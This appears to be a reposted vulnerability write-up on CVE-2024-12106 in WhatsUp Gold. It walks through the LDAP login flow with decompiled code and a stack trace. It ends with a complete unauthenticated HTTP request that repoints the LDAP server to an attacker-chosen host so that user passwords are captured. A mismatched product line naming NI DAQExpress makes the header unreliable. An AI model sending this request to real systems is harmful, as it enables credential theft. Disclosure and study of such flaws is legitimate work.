[CVE-2024-12106] - WhatsUp Gold 23.1.1 to 24.01 - Pre-Auth Evil LDAP and Password Theft

[Dark]

[CVE-2024-12106] - WhatsUp Gold 23.1.1 to 24.01- Pre-Auth Evil LDAP and Password Theft

P.S> This content's original source: https://exploit7.tr/posts/whatsupgold-cve-2024-12106/

Product: NI DAQExpress < 5.1

Severity:
CVSS3 - 7.5

Explanation: WhatsUpGold is a network monitoring tool developed by Progress. This article is a continuation of the WhatsUpGold Unauth Series.

Authentication Mechanism:

WhatsUpGold has multiple authentication systems, including automatic ones like OpenIdConnect, LDAP, and Active Directory.

When a user starts the login process, the backend checks whether the user is a local user (from the database) or an LDAP-Active Directory user. If the LDAP field exists in the GlobalSettings table in the database, it sends a request to the server listed there to check if the user exists. If the user isn't found, it queries the database. The system works like this in the background.


Authentication Mechanism:

WhatsUpGold has multiple controllers, and most features are handled through the /api/core/ controller.

The Core API controller includes measures like user session control. Through the WUG plugin and controller, LDAP functionality will be managed in a pre-auth (pre-authentication) manner.


LoginAjax:

The login process starts with the LoginAjax action and then moves to the ValidateUser section. ValidateUser is used to identify the user. For example, if the posted username contains the @ symbol, the system will prioritize directing the process to Active Directory.

public ActionResult LoginAjax(string username, string password, bool rememberMe)
        {
            bool flag = true;
            bool flag2 = false;
            string text = string.Empty;
            LogInViewModel logInViewModel = new LogInViewModel
            {
                Password = password,
                RememberMe = rememberMe,
                UserName = username
            };
            if (flag)
            {
                flag2 = this.loginModel.ValidateUser(logInViewModel);
                if (flag2)
                {
                    FormsAuthentication.SetAuthCookie(logInViewModel.UserName, logInViewModel.RememberMe);
                    this.userActivityLogger.Log(logInViewModel.UserName, "Authentication", "The user has logged in.");
                    this.SessionKeepAlive(logInViewModel.UserName);
                    GenericIdentity genericIdentity = new GenericIdentity(logInViewModel.UserName);
                    Language usersLanguage = this.lcl.GetUsersLanguage(base.Request.Cookies, base.Request.UserLanguages, genericIdentity);
                    this.lcl.SetUsersLanguage(base.Response.Cookies, usersLanguage.LCID);
                }
                else
                {
                    if (logInViewModel.ActiveSessionMessage.Contains("Cisco ACS Authentication Failed"))
                    {
                        this.userActivityLogger.Log(logInViewModel.UserName, "Authentication", logInViewModel.ActiveSessionMessage);
                        logInViewModel.ActiveSessionMessage = "Failure at authenticating server.";
                    }
                    text = logInViewModel.ActiveSessionMessage ?? this.lcl.Lookup("The user name or password provided is incorrect.");
                }
            }
            else
            {
                text = this.lcl.Lookup("Your license is invalid.");
            }
            return base.Json(new
            {
                authenticated = flag2,
                message = text,
                username = logInViewModel.UserName
            }, JsonRequestBehavior.AllowGet);
        }

Stack Trace:

+-- NmUserAuthenticator.Utilities.RegisterLdapAppServices(IUnityContainer) : void @06000009
   +-- NmUserAuthenticator.Utilities.RegisterServices(IUnityContainer) : void @06000014
      +-- NmUserAuthenticator.WugUserAuthenticationGateway.WugUserAuthenticationGateway(IUnityContainer, IUserAuthenticator) : void @06000026
         +-- NmUserAuthenticator.WugUserAuthenticationGateway.WugUserAuthenticationGateway(IUnityContainer) : void @06000025
            +-- NmUserAuthenticator.WugUserAuthenticationGateway.WugUserAuthenticationGateway() : void @06000024
               +-- Wug.UIServices.UserService.ValidateUser(ref string, string, out string) : bool @060000F2

LdapController:

On the LDAP Controller, certain post data is expected, including parameters like AdDomain, AuthScheme, LdapDn, Port, Server, and UseTls.

1. If the AuthScheme value is not equal to AdDomain, the LdapDn value is returned. If they are equal, it takes the AdDomain value and appends %s. This is because Active Directory auth adds the domain, for example: "EVILDOMAIN%s" (where %s represents the username from the post)
2. UseTls feature, if true, will establish a connection using the ldaps:// protocol. If false, the connection will use ldap://
3. Finally, based on the data received from the user, an XML will be created and added to the GlobalSettings table in the database as the ldap field

   XmlElement xmlElement = new XmlDocument().CreateElement(name);
   xmlElement.SetAttribute("authorize-dn", this.AuthDn());
   xmlElement.SetAttribute("port", this.Port.ToString());
   xmlElement.SetAttribute("secured", this.UseTls ? "1" : "0");
   xmlElement.SetAttribute("server", this.Server);
   xmlElement.SetAttribute("uri", this.FormUri());
   xmlElement.SetAttribute("use-ad", (this.AuthScheme == "ad-domain") ? "1" : "0");
   return xmlElement.OuterXml;

Exploit Part:

POST /NmConsole/Wug/Ldap/SaveConfig HTTP/1.1
Host: localhost
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=4, i
Content-Length: 91

AdDomain=a&AuthScheme=ad-domain&Port=389&Server=SERVER_IP&UseTls=false&LdapDn=CN=%s

Exploit Video: